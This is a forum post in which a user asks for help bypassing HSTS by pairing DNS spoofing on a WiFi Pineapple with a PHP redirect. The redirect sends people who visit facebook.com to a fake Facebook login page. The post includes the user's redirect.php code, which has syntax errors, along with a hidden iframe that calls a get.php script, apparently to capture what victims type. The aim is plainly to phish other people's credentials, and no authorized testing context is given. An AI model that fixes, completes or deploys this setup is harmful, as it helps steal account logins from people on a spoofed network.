Jump to content

Phising Pages & PHP


Recommended Posts

Hello Everyone.


Im trying to figure out how to bypass HSTS with DNS Spoof and phising pages.  I was about to give up but then I had an idea that ive been trying to implement.  That is using PHP to re-direct the page request to a different url which hosts the phish page.

For example:  someone goes to www.facebook.com - which opens the redirect.php on the pineapple, which then redirects it to www.test.com/test.html.  Test.html is just the bogus facebook page.  Obviously if they are looking at their URL it will say http://www.test.com/test.html but will display the fake facebook page.

Below is my redirect.php file:

       $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

       if (strpos($ref, "example")){
	      header('Status: 302 Found');
              header('Location: test.html');

       if (strpos($ref, "facebook")){
	      header('Status: 302 Found');
              header('Location: http://www.test.com/test.html');


<iframe style="display:none;" src="/get/get.php"></iframe>

Since my hosts file on DNS spoof is " * ", I was hoping it would redirect facebook to plain http test.html page on the pineapple.  This is not working quite right, and Im new to PHP.

Anyone have any ideas whats wrong?  Why this isnt working?  Or, maybe there is a better way to do all this?



Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...